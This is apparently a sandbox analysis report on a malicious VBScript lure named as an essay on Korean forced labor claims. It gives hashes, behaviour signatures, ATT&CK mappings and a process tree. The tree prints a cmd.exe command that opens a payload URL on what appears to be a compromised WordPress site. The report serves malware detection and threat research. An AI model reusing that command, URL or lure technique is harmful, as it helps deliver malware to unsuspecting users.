Overview

overview

8

Static

static

1

Essay on R...ms.vbs

windows7-x64

8

Essay on R...ms.vbs

windows10-2004-x64

8

Resubmissions

20-04-2024 06:42

240420-hgtw9sbe31 8

20-04-2024 06:23

240420-g5gfeabc2y 8

Analysis

  • max time kernel
    121s
  • max time network
    136s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    20-04-2024 06:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Essay on Resolution of Korean Forced Labor Claims.vbs

  • Size

    27KB

  • MD5

    75ec9f68a5b62705c115db5119a78134

  • SHA1

    6209f948992fd18d4fc6fc6f89d9815369ac8931

  • SHA256

    ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf

  • SHA512

    82a0d96640390b8ffdcecd34fc1ae1663c84a299448a5af02b24bf9b9e1fdd19954ceeeea555808a57fcdc452b2b6e598338f11bb0c7101b34934a8ec7bf1780

  • SSDEEP

    384:mrquVS33hr8nIsbSQVwooRmB7+shi14PdSkNk0dRL3K2fJ+QIHBR:mugSBrwIBQVwoI8dSMdBa2fGj

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Essay on Resolution of Korean Forced Labor Claims.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1976
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2916
      • C:\Windows\explorer.exe
        explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
        3⤵
          PID:2712
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:2716
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2108
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2108 CREDAT:275457 /prefetch:2
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2696

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Resource Development

    Reconnaissance

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      66282c8ca284388213520348825c353b

      SHA1

      66a1b478dcffb33b8c265727b35795cd50c06dfd

      SHA256

      4772114949565385d157177a42225cdc2bc7ed0e25659d073c7b7eaad735389f

      SHA512

      bb82ec4f53634e80d898d80e16d8503f449eda484301661e8568a55d1918f9a53df0826403a0f80cf5939039e4d745620a1e1b6273c4d3abfcb397257f122cd6

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      fe0747927af0752c23fe8bc457124da9

      SHA1

      b1b5e76aafa6fa8dbad95015b0a59e1f08c35ff6

      SHA256

      a298d650a7baa71ce7ec90a9071efe61003a27c2ce99ff7c9df6a2fd52bcfe89

      SHA512

      e12bc15d7f58c95f20e7dfea2872ae7b5fdcd95fbe8d6debe2911c30403246f8e073a9d4aa441198f8764aff3151aa37308a480a275495e5ff44bfccbf8db47f

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      45fa2fc6750169594cf57a887813deac

      SHA1

      86fe43da600a90a64f2d64bc1c7a0ed5e939d2a3

      SHA256

      9d86e7353ca1fb22e07780a9b0800dfcdbd5a83713822c4b05ab1e3109ca16a9

      SHA512

      7d0a5b848ab2792c81858be820ac37cdb203b44a268b0b81a27464d54eff6254eba83cacb20e3ce5f8151d4fa030fed7e35ae3625d40e49714ad0b63117869b0

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      5def8a1bcc1e83bf8878d3bfa334ddca

      SHA1

      82ce3273fae9efca651908b119aaa4072ce1af79

      SHA256

      df98a15befba5cc337d47a22e727c469801262598b0f0d7c04ca9cec4219b53d

      SHA512

      e474141368c62efcfb1f0d7f67ee8624e1a40f4dc7bed4e419ad6afa1f6a4a51f625a07e959e2e1f17e891b688aa02432c9478941402dc14c8d4ca7f4a0324eb

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      894c6e9a3c9692bf664c7a5ce3fe87d3

      SHA1

      e848b4c137f46051df995d8a5d451e25ecb85c93

      SHA256

      4b46fa6c28e5d241612de142e28b8d5017352e37f42cbeae4391937d2823cfae

      SHA512

      017bfe4df373af7bdae705445462ae781db0e4c4b7a0a15fcad2f3cc735f08cbb165e976e4f194916f1334c22657de3476c3b112fe17ba676f5017abf11765e1

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\Cab81A1.tmp
      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\Tar82C1.tmp
      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

      Download Submit